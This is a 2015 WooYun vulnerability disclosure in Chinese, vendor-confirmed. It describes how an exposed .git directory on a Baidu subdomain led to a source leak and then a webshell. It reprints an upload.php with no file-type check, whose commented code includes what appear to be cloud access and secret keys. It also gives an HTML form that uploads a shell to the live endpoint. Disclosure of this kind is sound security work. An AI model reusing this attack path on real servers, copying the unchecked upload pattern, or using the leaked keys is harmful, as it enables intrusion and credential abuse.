当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114272

漏洞标题:百度从git信息泄露到getshell漫游内网

相关厂商:百度

漏洞作者: 杀器王子

提交时间:2015-05-15 13:25

修复时间:2015-07-03 13:44

公开时间:2015-07-03 13:44

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-15: 细节已通知厂商并且等待厂商处理中
2015-05-19: 厂商已经确认,细节仅向厂商公开
2015-05-29: 细节向核心白帽子及相关领域专家公开
2015-06-08: 细节向普通白帽子公开
2015-06-18: 细节向实习白帽子公开
2015-07-03: 细节向公众公开

简要描述:

杀器在手,天下我有!

详细说明:

http://hybrid.baidu.com/.git/config
一个git信息泄露,可以下载代码;

➜  hybrid.baidu.com git:(master) ✗ ls -lh
total 0
drwxr-xr-x  22 tank  staff   748B  5 15 12:46 general
drwxr-xr-x  20 tank  staff   680B  5 15 13:09 wenku


里面有个upload.php,看看

<?php
/**
 * 上传
 */
error_reporting(0);
session_start();
$allow_sep = "1"; //限制重复上传时间,防止短时间刷新本文件重复上传,以秒为单位
if (isset($_SESSION['post_sep']))
{
if (time() - $_SESSION['post_sep'] < $allow_sep)
{
exit('wait 1 second');
}
else
{
$_SESSION['post_sep'] = time();
}
}
else
{
$_SESSION['post_sep'] = time();
}
date_default_timezone_set('Asia/Shanghai');
if($_SERVER['REQUEST_URI']) {
$temp = urldecode($_SERVER['REQUEST_URI']);
if(strpos($temp, '<') !== false || strpos($temp, '>') !== false || strpos($temp, '(') !== false || strpos($temp, '"') !== false) {
exit('Request Bad url');
}
}
if($_FILES['Filedata']['size'] != 0){
if(isset($_FILES['Filedata']) && is_array($_FILES['Filedata'])) {
$attach = $_FILES['Filedata'];
}
$max_upload_size = 10485760; //单位字节
$old_attachName = mb_detect_encoding($attach['name'])=='UTF-8'?$attach['name']:iconv('gbk',"utf-8",$attach['name']);
$attach['ext']  = explode('.', $attach['name']);
if (($length = count($attach['ext'])) > 1) {
$ext = strtolower($attach['ext'][$length - 1]);
}
$year = date("Y");
$month = date("m");
$day = date("d");
$fnamehash = md5(uniqid(microtime()));// fnamehash变量为当前时间的MD5散列,重命名附件名
$new_dir_name = $year.'-'.$month.'-'.$day.'-'.$fnamehash;
$object = '/www'.'.'.$ext;
if(!file_exists(dirname(__FILE__).'/temp/'.$new_dir_name)){
  mkdir(dirname(__FILE__).'/temp/'.$new_dir_name, 0777);
}
$path =$attach['tmp_name'];
$opt=array(
"filename"=>$old_attachName,
"acl"=>"public-read"
);
 move_uploaded_file($path,
     dirname(__FILE__). "/temp/".$new_dir_name . $object);
//echo "http://10.42.82.59/zhaojie/temp".$object;
echo dirname(__FILE__)."/temp/".$new_dir_name . $object;
return;
//require_once('./bcs/bcs.class.php');
/*
$host = 'bcs-sandbox.baidu.com'; //offline
$ak = 'J78GkSfzDt1VmNlvy2Erg5uErXofKbTXZa9';
$sk = '6xvpoHR2tCpkHXGBHLtfzPqRq0oGamyWa';
$bucket = 'auto-pack-bucket-nanjing';
$baidu_bcs = new BaiduBCS ( $ak, $sk, $host );
if ($attach['size'] > $max_upload_size) { 
    //@unlink($attach['tmp_name']);
     echo 'max limited';}
$response = $baidu_bcs->create_object ( $bucket, $object, $path ,$opt); //上传附件
if (! $response->isOK ()) die ( "upload object failed." );
$opt = array ();
$opt ["time"] = time () + 3600; //可选,链接生效时间为linux时间戳向后一小时 
*/
echo $baidu_bcs->generate_get_object_url ( $bucket, $object, $opt );
}
?>


getshell

<html>
<body>
<form action="http://hybrid.baidu.com/wenku/upload.php" method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" id="file" /> 
<br />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>

漏洞证明:

http://hybrid.baidu.com/wenku/temp/2015-05-15-e876c4f4056327c58fa22e467e8e5d7f/www.php

baidu.png


baidu2.png


baidu3.png

修复方案:

git

版权声明:转载请注明来源 杀器王子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-19 13:43

厂商回复:

感谢

最新状态:

暂无